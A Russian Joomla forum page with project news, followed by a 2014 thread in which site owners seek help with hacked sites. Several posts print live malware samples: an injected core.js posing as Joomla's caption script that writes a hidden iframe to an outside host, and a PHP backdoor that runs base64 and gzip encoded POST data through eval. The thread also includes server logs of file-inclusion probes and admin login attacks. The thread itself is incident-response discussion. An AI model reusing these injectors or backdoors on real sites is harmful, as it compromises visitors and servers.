Новости Joomla

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🏆 Открыто голосование за Joomla в  премии CMS Critic People’s Choice Awards 2025

🗓 Голосование продлится до 27 февраля 2026 года.

👩‍💻 Проголосовать! 👩‍💻

Номинации, в которых можно проголосовать за Joomla:
⭐️ Best Free CMS
⭐️ Best Open Source CMS
⭐️ Best Enterprise CMS

Также в номинации Best e-Commerce Solution участвуют компоненты интернет-магазинов для Joomla:
⭐️ HikaShop
⭐️ Virtuemart

В номинации Best Website Builder оказались:
⭐️ YooTheme
⭐️ SP Page Builder

Что такое CMS Critic Awards?
С 2012 года премия CMS Critic Awards занимает особое место в сообществе систем управления контентом (CMS). Это единственный в своем роде сайт, который составляет рейтинг системы управления контентом и связанных с ними решений на рынке — от малого до крупного и подчеркивает их инновации и услуги.

Каждый год награда CMS Critic Awards присуждается одному победителю в различных отраслевых категориях, таких как: «Лучшая облачная CMS», «Лучший DXP», «Лучшая Headless CMS и других. Затем результаты оглашаются через СМИ вместе с выбором редакции CMS Critic.
В этом году премия вернулась к своим традициям и только TOP-5 движков по количеству номинаций попали в 2-й этап - голосование.

@joomlafeed

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

Вы уверенно чувствуете себя перед камерой, динамичны, обаятельны и всегда улыбаетесь? Чувствуете себя искателем приключений, готовым поделиться своими исследованиями CMS Joomla!, взять интервью у видных деятелей сообщества, пообщаться лично или по видеосвязи с волонтерами Joomla или отправиться на поиски новых идей?

Joomla ищет одного или нескольких волонтеров, готовых вдохнуть новую жизнь в обсуждение Joomla, ее CMS, пользователей, сообщества и многого другого.

Возможны самые разные форматы и темы: шортсы, интервью, аналитика и разборы в режиме реального времени, быстрые советы и рекомендации, знакомство с миром Joomla, изучение открытого исходного кода... Нет никаких ограничений!

Joomla! уже активно представлена ​​во многих социальных сетях:
- 155K подписчиков на Facebook,
- 55K подписчиков на X (ранее Twitter),
- 16K подписчиков на YouTube,
- 14K подписчиков на LinkedIn,
- 5,7K подписчиков в Instagram
а так же другие площадки ждут вас. Аккаунты Threads и Bluesky относительно новые, но их популярность только растёт!

А если хватит энергии, можно рассмотреть и TikTok!

❓ Итак, вы готовы?
👉 Свяжитесь с отделом маркетинга по адресу: marketing@community.joomla.org

Подробности в статье в Joomla Community Magazine.

@joomlafeed

0 Пользователей и 1 Гость просматривают эту тему.
  • 19 Ответов
  • 36192 Просмотров
*

fendolf

  • Осваиваюсь на форуме
  • 36
  • 0 / 0
Вирусы на всех хостингах
« : 13.01.2014, 21:08:28 »
просто паника, куча сайтов с вирусами как бороться не знаю. помогите! инфицируються js файлы либо дописывают себя либо просто подменяют.
вот пример http://corona24.ru
в http://corona24.ru/media/system/js/core.js

Код
//copyright
/**
* license GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/

/**
* JCaption javascript behavior
*
* Used for displaying image captions
*
* @package Joomla
* @since 1.5
* @version 1.0
*/
(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset))!== -1) {
return index;
}
return false;
}
function uigentuse(){
var klausnegre = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/18.0|Firefox/18.0.1|Firefox/17.0|Firefox/12.0|Firefox/25.0|Firefox/24.0|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/20.0|Firefox/21.0|Firefox/22.0|Firefox/23.0|Firefox/25.0.1|Firefox/26.0|Firefox/27.0|Maxthon|ChromePlus|rv:11.0|MRSPUTNIK|Mini|Firefox/28.0|BlackBerry|PLAYSTATION';
klausnegre = klausnegre.split('|');
var nihtgerma = false;
for (var i in klausnegre) {
if (stripos(navigator.userAgent, klausnegre[i])!==false) {
nihtgerma = true;
break;
}
}
return nihtgerma;
}
function setCookie(name, value, expires) {
var date = new Date( new Date().getTime() + expires*1000 );
document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" ));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!uigentuse()) {
var cookie = getCookie('urgen7ryam9ole84kerl19nam');
if (cookie == undefined) {
setCookie('urgen7ryam9ole84kerl19nam', true, 86400);
document.write('<iframe'+' s'+'r'+'c'+'="http://trahopa.adepoju.org/gsdgtjtj.cgi?15" s'+'t'+'yl'+'e'+'='+'p'+'osi'+'t'+'io'+'n'+':'+'ab'+'s'+'o'+'lut'+'e'+';'+'le'+'f'+'t:-1100px;top:-1100px; height="170" width="170"></iframe>');
}
}
})();



чищу файлы, ставлю права 555 через время появляются снова, кто в курсе?

*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Вирусы на всех хостингах
« Ответ #2 : 13.01.2014, 22:13:52 »
Искать шелл, уязимости и устранять.
*

fendolf

  • Осваиваюсь на форуме
  • 36
  • 0 / 0
Re: Вирусы на всех хостингах
« Ответ #3 : 13.01.2014, 22:21:56 »
объясни подробнее что значит "Ищи шелл"
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Вирусы на всех хостингах
« Ответ #4 : 13.01.2014, 23:54:03 »
Шелл - это скрипт, который дает доступ к аккаунту хостинга (ну или серверу, если хакер профессионал и сломал сервер). Заливается через уязвимости. Его может и не быть. Могут сразу лить вредоносные скрипты. Для начала надо закрыть уязвимости.
*

fendolf

  • Осваиваюсь на форуме
  • 36
  • 0 / 0
Re: Вирусы на всех хостингах
« Ответ #5 : 14.01.2014, 07:26:46 »
вот такая бяка в логе. можно ли как то закрыть htaccess ?
24sbs.ru 88.225.216.237 - - [13/Jan/2014:23:16:19 +0400] "GET /includes/functions.inc.php?sitepath=data://text/plain;base64,U0hFTExfTU9KTk9fUFJPQk9WQVRK HTTP/1.0" 404 224 "-" "Mozilla/4.0 (compatible; Synapse)"
24sbs.ru 88.225.216.237 - - [13/Jan/2014:23:16:19 +0400] "GET /includes/functions.php?phpbb_root_path=data://text/plain;base64,U0hFTExfTU9KTk9fUFJPQk9WQVRK HTTP/1.0" 404 220 "-" "Mozilla/4.0 (compatible; Synapse)"
24sbs.ru 88.225.216.237 - - [13/Jan/2014:23:16:20 +0400] "GET /includes/header.php?systempath=data://text/plain;base64,U0hFTExfTU9KTk9fUFJPQk9WQVRK HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; Synapse)"
24sbs.ru 88.225.216.237 - - [13/Jan/2014:23:16:20 +0400] "GET /index.php?lang=data://text/plain;base64,U0hFTExfTU9KTk9fUFJPQk9WQVRK HTTP/1.0" 404 207 "-" "Mozilla/4.0 (compatible; Synapse)"
24sbs.ru 94.249.192.83 - - [13/Jan/2014:23:18:34 +0400] "POST /administrator/index.php HTTP/1.0" 200 58 "http://24sbs.ru/administrator/index.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36"
24sbs.ru 94.249.192.83 - - [13/Jan/2014:23:18:35 +0400] "GET /administrator/index.php HTTP/1.0" 200 58 "24sbs.ru" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
*

verstalshik

  • Завсегдатай
  • 1754
  • 95 / 1
Re: Вирусы на всех хостингах
« Ответ #6 : 14.01.2014, 08:01:34 »
мля, и это все? да закройте эти ДВА айпи навечно и усе... и ждите новых..)))
❶ НЕ СПРАВЛЯЕШЬСЯ САМ???  Поможем тут...  ❷ Калькулятор доставки - ЗАКАЖИ!!!...  ❸ Каталог компаний - ЖМИ!!!...  ❹ НОВИЧКИ! ВСЕ сюда! Первая консультация БЕСПЛАТНО!!
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Вирусы на всех хостингах
« Ответ #8 : 15.01.2014, 01:10:20 »
мля, и это все? да закройте эти ДВА айпи навечно и усе... и ждите новых..)))
А какая логика? При взломе юзается Proxy, забанели один, юзается другой, проблемы это не решит..., а освоив принцип баги можно устранить проблему... а суть проблемы в регулярном выражении preg_*() с модификатором  /e который при обработки данных позволяет выполнять php код, в паблике уже разобран этот вопрос и есть готовое решение...
« Последнее редактирование: 15.01.2014, 06:02:04 от winstrool »
*

verstalshik

  • Завсегдатай
  • 1754
  • 95 / 1
Re: Вирусы на всех хостингах
« Ответ #9 : 15.01.2014, 10:07:51 »
да какая логика - автор что написал, о том и сужу... мож у него эти два айпи всего и вылезли, может и не будет больше ничего далее, пусть попробует минимальными силами сначала-то...
❶ НЕ СПРАВЛЯЕШЬСЯ САМ???  Поможем тут...  ❷ Калькулятор доставки - ЗАКАЖИ!!!...  ❸ Каталог компаний - ЖМИ!!!...  ❹ НОВИЧКИ! ВСЕ сюда! Первая консультация БЕСПЛАТНО!!
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Вирусы на всех хостингах
« Ответ #10 : 15.01.2014, 11:13:10 »
А какая логика? При взломе юзается Proxy, забанели один, юзается другой, проблемы это не решит..., а освоив принцип баги можно устранить проблему... а суть проблемы в регулярном выражении preg_*() с модификатором  /e который при обработки данных позволяет выполнять php код, в паблике уже разобран этот вопрос и есть готовое решение...
не у всех же такие глубокие познания ^-^
Код
eval(
еще раньше разобрали
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Вирусы на всех хостингах
« Ответ #11 : 15.01.2014, 19:25:10 »
не у всех же такие глубокие познания ^-^
Код
eval(
еще раньше разобрали
И поэтому большая часть анти-шелл скриптов  не касается функций семейства *_реплейсов, ассертов, матчей и бурят только eval и base64? а потом удивляются как же так... не нашел((( и в логах не засветился((( что же может быть?

Скажу по секрету... щас даже конструкция
Код
echo $a;
может являться в качестве мини шелла...


P.S: ТС, если вас не смущает, было бы интиресно логи посмотреть...
« Последнее редактирование: 15.01.2014, 19:39:52 от winstrool »
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Вирусы на всех хостингах
« Ответ #12 : 16.01.2014, 08:51:19 »
И поэтому большая часть анти-шелл скриптов  не касается функций семейства *_реплейсов, ассертов, матчей и бурят только eval и base64? а потом удивляются как же так... не нашел((( и в логах не засветился((( что же может быть?

Скажу по секрету... щас даже конструкция
Код
echo $a;
может являться в качестве мини шелла...


P.S: ТС, если вас не смущает, было бы интиресно логи посмотреть...

Ну не удержусь и прорекламирую как себя так и еще многих, @winstrool опять ошибка в тексте наши сканеры видят все и вхождение выше от
Цитировать
echo $a;
и все остальное были единичные случаи когда сами, что то визуально пропускали и на этом многому научились, ну а остальные "профи" или кто сами "чистят" годами пытаются чистить правильно выражусь, они не понимают что нет и не будет автоматики ни какой, как код пишут руками смотря на него глазами, так и чистить его надо глазами и руками (тем более один и тот же код может быть написан разными символами если на него смотреть глазами  ^-^ ), а они надеются что им сделают "единую кнопку" и она за них всю работу выполнит (бредовые их надежды)
кстати по
Цитировать
echo $a;
выводится как раз какая то функция и либо она просто прописана либо обсуфицирована, но она находится, а вывод может и остаться от него толку уже не будет

PHP-инъекция появилась и обсуждается практически вместе с появлением самого интерпретатора

Для "танкистов" которые задают вопросы как/почему, и не расписывают подробно вопрос (может сами инъекцию написали и положили к себе на сайт, то что установили это точно что то уязвимое, или не понимают читая доки что надо обновлять все что работает, автоматику всем подавай, интернет общедоступный как задумывался так и будет просто народу об этом больше узнало, а те кто не знают узнают когда сайт им сломают, общедоступность сети была заложена после создания и тестирования, её сделали для того что бы видеть все что у всех и владеть этой информацией, только теперь кто то делает типа защиты и кто то в них постоянно находит уязвимости, не реально на 100% защитить общедоступное) не могут сами ответить, или надеются, что за них кто то, сделает их работу распишет как потратить день-два-три поминутно и на какие кнопки "жмахать", да бы им была радость, для таких даже не знаю что отвечать уже, им направление подсказываем, они обижаются, не понимают, что вопросы типа "какого цвета машина папы моего соседа по парте" ну ни как не получат ответа потому что ни кто не знает этого "прохожего", тем более ни соседа по парте, ни тем более его папу не видел, а мануал пишем кто то уже читает (но все равно "прохожему" не понять), не могу оспорить иногда ответ краток и подразумевает под собой то что тот кто задает вопрос хоть немного в теме, если он скажет что нет и у кого то есть время то ему может быть "разжуют", но времени потребуется больше чем выполнить работу в десятки разы, из-за этого такие вопросы в основном или безответны или ответ краток, а обиды задающего не обоснованы, по тому что "он не в той бронемашине где рычаги надо дергать"
*

yutex_artem

  • Осваиваюсь на форуме
  • 32
  • 1 / 0
Re: Вирусы на всех хостингах
« Ответ #13 : 16.01.2014, 11:49:35 »
просто паника, куча сайтов с вирусами как бороться не знаю. помогите! инфицируються js файлы либо дописывают себя либо просто подменяют.
вот пример http://corona24.ru
в http://corona24.ru/media/system/js/core.js

Код
//copyright
/**
* license GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/

/**
* JCaption javascript behavior
*
* Used for displaying image captions
*
* @package Joomla
* @since 1.5
* @version 1.0
*/
(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset))!== -1) {
return index;
}
return false;
}
function uigentuse(){
var klausnegre = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/18.0|Firefox/18.0.1|Firefox/17.0|Firefox/12.0|Firefox/25.0|Firefox/24.0|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/20.0|Firefox/21.0|Firefox/22.0|Firefox/23.0|Firefox/25.0.1|Firefox/26.0|Firefox/27.0|Maxthon|ChromePlus|rv:11.0|MRSPUTNIK|Mini|Firefox/28.0|BlackBerry|PLAYSTATION';
klausnegre = klausnegre.split('|');
var nihtgerma = false;
for (var i in klausnegre) {
if (stripos(navigator.userAgent, klausnegre[i])!==false) {
nihtgerma = true;
break;
}
}
return nihtgerma;
}
function setCookie(name, value, expires) {
var date = new Date( new Date().getTime() + expires*1000 );
document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" ));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!uigentuse()) {
var cookie = getCookie('urgen7ryam9ole84kerl19nam');
if (cookie == undefined) {
setCookie('urgen7ryam9ole84kerl19nam', true, 86400);
document.write('<iframe'+' s'+'r'+'c'+'="http://trahopa.adepoju.org/gsdgtjtj.cgi?15" s'+'t'+'yl'+'e'+'='+'p'+'osi'+'t'+'io'+'n'+':'+'ab'+'s'+'o'+'lut'+'e'+';'+'le'+'f'+'t:-1100px;top:-1100px; height="170" width="170"></iframe>');
}
}
})();



чищу файлы, ставлю права 555 через время появляются снова, кто в курсе?



Данный код попал скорее всего через данный шелл, в папке modules в файлах ищите примерно следующий код
--
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){echo '<textarea id=areatext>';eval($msg);echo '</textarea>bg';exit;}} exit;

--
а сам этот шелл попал либо через другой шелл(его само собой так же нужно найти), либо через админку сайта

Смените все пароли на ftp и админки Joomla

*

siynik

  • Осваиваюсь на форуме
  • 13
  • 0 / 0
Re: Вирусы на всех хостингах
« Ответ #14 : 18.01.2014, 11:30:01 »
Может не по адресу, но все же.
Есть 2 сайта
1.Joomla! 2.5.6 установлен JoomShopping и Akeeba Backup
2. Joomla! 2.5.17 только JoomShopping
На первый месяца два назад как то закачали скрипт отправки спама, скрипт нашел - удалил, но как он туда попал не понял.  Находился в папке tmp/ в корне сайта. Ну удалил и все, забыл.
Было бы все нормально, но сегодня уже второй сайт с такими же симптомами - зная проблему прошлого - залез на хост скачал папку tmp - проверил на вирусы dr. Web. Он подтвердил мои подозрения файл jm.php dr.web указал как зараженный файл - написал угроза php.shell.26
Вопрос в следующем - куда рыть? как понять как закачиваются эти скрипты. Сайты на разных серверах - так что с одного на другой не могли перескочить. Пароли на хосте к ftp хорошие - генерируемый с всеми возможными символами разного регистра, знаков 8 если не больше. В админку тоже нормальный пароль + хостер не дает больше 5 попыток для ввода пароля - банят.
Как я понимаю есть дыра, а как ее найти не знаю.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Вирусы на всех хостингах
« Ответ #15 : 18.01.2014, 17:08:45 »
Цитировать
1.Joomla! 2.5.6 установлен JoomShopping и Akeeba Backup
так его уж как год обновить тому назад надо было и так еще 11 раз что бы не было вопроса
Цитировать
На первый месяца два назад как то закачали скрипт отправки спама, скрипт нашел - удалил, но как он туда попал не понял.  Находился в папке tmp/ в корне сайта. Ну удалил и все, забыл.
и дочистить надо а не тупо удалить один скрипт там уже разбросали по сайту все что можно и нельзя
Цитировать
как понять как закачиваются эти скрипты
а зачем понимать требуется вовремя обновлять сайты и все используемые расширения если пишут что обновили то либо не все либо уже была залита зараза и обновление ни как не поможет, тем более обновление ну ни как не поможет почистить уже если было проникновение, все просто все shell-ы это отдельные файлы от системы или дописки в родные кода

что бы вам ответили как минимум требуется написать весь список используемых расширений с версиями это модули плагины компоненты

и всем кто пишет как понять как закачиваются эти скрипты или где дыра или подобное просьба понять ваше описание тапа
Цитировать
Joomla! 2.5.6 установлен JoomShopping и Akeeba Backup
ни кому ни чего не говорит, видно сразу что сайт год не обновлялся это раз, то что у вас кроме JoomShopping и Akeeba Backup еще установлено десятка как минимум три дополнений как родных так и от сторонних разработчиков это два, многие почемуто внимание не обращают на то что работают с dumper и любым другим сторонним расширением которые используют для работы с БД или файлами(файловые менеджеры) это три и важное в описании того что установлено еще добавить пункт раз два сайта так может вы скопировали с первого и обновить второй обновили а там седела уже зараза, теперь вопрос ко всем кто задает вопрос как или почему или где

есть интересная передача Что, где и когда? так вот вы если смотрели то наверное заметили что так не отвечают на вопрос
Цитировать
Где?
вопрос где ставится или в начале или в конце развернутого вопроса
Как вы думаете Вам кто то ответит в слепую? сможет?

иногда в переписке приходится просто вытягивать на протяжении дня, а то и 2-3 дней что установлено на сайте и зайдя по ftp видно все что есть, и то что тот кто тебе, три дня что то писал, так и не перечислил полностью весь список, это или лень или не знание предмета, и все темы в которых задают такие вопросы и будут без ответные потому что даже если человек знает предмет ему лень гадать, напрягать мозг, или писать несколько развернутых ответов, тем более они есть все на форуме и расписаны, если вы читаете и не понимаете что то о чем читаете это и ваш случай, тогда надо писать вопрос так кто ткнет носом?, это будет правильнее, единичных случаев мало очень мало, другое дело что код заразы и название файлов практически всегда разные, но это уже издержки и не относятся к таким неразведанным вопросам как? и где?
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Вирусы на всех хостингах
« Ответ #16 : 18.01.2014, 17:53:04 »
Может не по адресу, но все же.
Есть 2 сайта
1.Joomla! 2.5.6 установлен JoomShopping и Akeeba Backup
2. Joomla! 2.5.17 только JoomShopping
На первый месяца два назад как то закачали скрипт отправки спама, скрипт нашел - удалил, но как он туда попал не понял.  Находился в папке tmp/ в корне сайта. Ну удалил и все, забыл.
Было бы все нормально, но сегодня уже второй сайт с такими же симптомами - зная проблему прошлого - залез на хост скачал папку tmp - проверил на вирусы dr. Web. Он подтвердил мои подозрения файл jm.php dr.web указал как зараженный файл - написал угроза php.shell.26
Вопрос в следующем - куда рыть? как понять как закачиваются эти скрипты. Сайты на разных серверах - так что с одного на другой не могли перескочить. Пароли на хосте к ftp хорошие - генерируемый с всеми возможными символами разного регистра, знаков 8 если не больше. В админку тоже нормальный пароль + хостер не дает больше 5 попыток для ввода пароля - банят.
Как я понимаю есть дыра, а как ее найти не знаю.
Может логи выложите? то что пасс хорошо генерируемый, это хорошо)
*

siynik

  • Осваиваюсь на форуме
  • 13
  • 0 / 0
Re: Вирусы на всех хостингах
« Ответ #17 : 18.01.2014, 22:57:40 »
что бы вам ответили как минимум требуется написать весь список используемых расширений с версиями это модули плагины компоненты

Спасибо и за это:)
Дальше буду подробнее описывать ситуацию.
Опишу о втором случая - так как первый, соглашусь много моментов есть с старой версией компонентов, да и самой Joomla(просто сам компонент joomshoppinga не могу обновить, много программной части было сделано - а при обновлении слетает все).
Всегда ставлю только свежие версии с оф. сайта когда устанавливаю. Никаких сборок не приветствую. Отдельно Joomla ставилась - отдельно шопинг. Сайту отроду пару недель то. Сторонних плагинов не ставил.
Далее еще раз пройду по-подробнее.
1. Joomla! 2.5.17
2. JoomShopping Version 3.15.3
3. Выкладываю скрин с ftp папки компонентов

4. Скрин админки, в самом низу пишется что все самое свежее и красивое:)

5. Сапорт на хостинге адекватный и сами нашли источник и проверили на наличие шелов - вот их заключение
Код
На данный момент проблема была в том что спам рассылался с помощью perl скрипта, вот что удалось найти на данный момент . 

root@server [/var/spool/exim/input]# ps -C perl
PID TTY TIME CMD
20778 ? 00:16:10 perl
root@server [/var/spool/exim/input]# lsof -p 20778
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
perl 20778 printdec cwd DIR 8,1 4096 57737 /home/printdec
perl 20778 printdec rtd DIR 8,1 4096 2 /
perl 20778 printdec txt REG 8,1 17152 3527 /usr/local/bin/perl
perl 20778 printdec mem REG 8,1 27424 40407 /lib64/libnss_dns-2.12.so
perl 20778 printdec mem REG 8,1 65928 40798 /lib64/libnss_files-2.12.so
perl 20778 printdec mem REG 8,1 43203 162121 /usr/local/lib/perl5/5.8.8/x86_64-linux/auto/Socket/Socket.so
perl 20778 printdec mem REG 8,1 469528 40601 /lib64/libfreebl3.so
perl 20778 printdec mem REG 8,1 1143019 279230 /usr/local/lib/perl5/5.8.8/x86_64-linux/CORE/libperl.so
perl 20778 printdec mem REG 8,1 1921216 14489 /lib64/libc-2.12.so
perl 20778 printdec mem REG 8,1 14584 40417 /lib64/libutil-2.12.so
perl 20778 printdec mem REG 8,1 40400 40398 /lib64/libcrypt-2.12.so
perl 20778 printdec mem REG 8,1 596264 40789 /lib64/libm-2.12.so
perl 20778 printdec mem REG 8,1 19536 40785 /lib64/libdl-2.12.so
perl 20778 printdec mem REG 8,1 113432 40793 /lib64/libnsl-2.12.so
perl 20778 printdec mem REG 8,1 110960 40804 /lib64/libresolv-2.12.so
perl 20778 printdec mem REG 8,1 154520 40743 /lib64/ld-2.12.so
perl 20778 printdec 0r CHR 1,3 0t0 3661 /dev/null
perl 20778 printdec 1w FIFO 0,8 0t0 29912186 pipe
perl 20778 printdec 2w FIFO 0,8 0t0 29912186 pipe
perl 20778 printdec 3r REG 8,1 13512 59501 /tmp/sess_f652da7dd28dce7baeeae54a46ae4092 (deleted) <----------- ПРОЦЕСС КОТОРЫЙ ОБЕСПЕЧИВАЛ РАССЫЛКУ СПАМА
perl 20778 printdec 4wW REG 8,1 0 59535 /tmp/...

Мы удалили этот процесс и рассылка прекратилась .
Сейчас Вам необходимо сменить root пароль от сервера, пароли доступа в панель cPanel / WHM , пароли на почтовые ящики для аккаунта printdec .
Логи сайта закинул - их много, но выложил как раз за эту ночь и вчерашний вечер - или скинуть файлом? ну если что-то не так сделал - скажите переделаю.
Код
194.28.84.86 - - [17/Jan/2014:22:03:19 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.6.142 - - [17/Jan/2014:22:03:47 +0200] "-" 400 0 "-" "-"
194.28.6.142 - - [17/Jan/2014:22:03:47 +0200] "-" 400 0 "-" "-"
194.28.6.142 - - [17/Jan/2014:22:03:47 +0200] "-" 400 0 "-" "-"
194.28.6.142 - - [17/Jan/2014:22:03:47 +0200] "-" 400 0 "-" "-"
194.28.6.142 - - [17/Jan/2014:22:03:48 +0200] "-" 400 0 "-" "-"
194.28.6.142 - - [17/Jan/2014:22:03:48 +0200] "-" 400 0 "-" "-"
194.28.6.142 - - [17/Jan/2014:22:03:48 +0200] "-" 400 0 "-" "-"
194.28.6.142 - - [17/Jan/2014:22:03:48 +0200] "-" 400 0 "-" "-"
194.28.6.142 - - [17/Jan/2014:22:03:48 +0200] "-" 400 0 "-" "-"
194.28.6.142 - - [17/Jan/2014:22:03:48 +0200] "-" 400 0 "-" "-"
176.121.205.38 - - [17/Jan/2014:22:04:43 +0200] "-" 400 0 "-" "-"
46.160.74.237 - - [17/Jan/2014:22:04:57 +0200] "-" 400 0 "-" "-"
46.160.74.237 - - [17/Jan/2014:22:04:58 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:22:05:19 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
109.205.248.98 - - [17/Jan/2014:22:06:09 +0200] "-" 400 0 "-" "-"
176.121.205.38 - - [17/Jan/2014:22:07:03 +0200] "-" 400 0 "-" "-"
176.121.205.38 - - [17/Jan/2014:22:07:03 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:22:07:19 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
176.121.205.38 - - [17/Jan/2014:22:07:23 +0200] "-" 400 0 "-" "-"
176.121.205.38 - - [17/Jan/2014:22:07:23 +0200] "-" 400 0 "-" "-"
176.121.205.38 - - [17/Jan/2014:22:07:23 +0200] "-" 400 0 "-" "-"
176.121.205.38 - - [17/Jan/2014:22:07:23 +0200] "-" 400 0 "-" "-"
176.121.205.38 - - [17/Jan/2014:22:07:53 +0200] "-" 400 0 "-" "-"
176.121.205.38 - - [17/Jan/2014:22:07:53 +0200] "-" 400 0 "-" "-"
176.121.205.38 - - [17/Jan/2014:22:07:53 +0200] "-" 400 0 "-" "-"
176.121.205.38 - - [17/Jan/2014:22:07:53 +0200] "-" 400 0 "-" "-"
176.121.205.38 - - [17/Jan/2014:22:07:53 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:22:09:19 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
46.48.29.225 - - [17/Jan/2014:22:11:27 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [17/Jan/2014:22:11:48 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [17/Jan/2014:22:11:48 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [17/Jan/2014:22:11:48 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:22:12:13 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:22:13:16 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
46.191.188.171 - - [17/Jan/2014:22:13:47 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:22:15:31 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [17/Jan/2014:22:17:51 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
193.17.208.66 - - [17/Jan/2014:22:19:18 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [17/Jan/2014:22:19:18 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [17/Jan/2014:22:19:18 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [17/Jan/2014:22:19:18 +0200] "-" 400 0 "-" "-"
82.75.112.208 - - [17/Jan/2014:22:19:35 +0200] "GET /administrator/index.php HTTP/1.1" 200 4574 "-" "Mozilla/3.0 (compatible; Indy Library)"
82.75.112.208 - - [17/Jan/2014:22:19:41 +0200] "POST /administrator/index.php HTTP/1.0" 303 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
82.75.112.208 - - [17/Jan/2014:22:19:41 +0200] "POST /administrator/index.php HTTP/1.0" 303 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
82.75.112.208 - - [17/Jan/2014:22:19:42 +0200] "POST /administrator/index.php HTTP/1.0" 303 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
82.75.112.208 - - [17/Jan/2014:22:19:42 +0200] "POST /administrator/index.php HTTP/1.0" 303 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
82.75.112.208 - - [17/Jan/2014:22:19:43 +0200] "POST /administrator/index.php HTTP/1.0" 303 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
82.75.112.208 - - [17/Jan/2014:22:19:43 +0200] "GET /administrator/index.php HTTP/1.1" 200 7057 "-" "Mozilla/3.0 (compatible; Indy Library)"
193.17.208.66 - - [17/Jan/2014:22:19:48 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:22:20:00 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
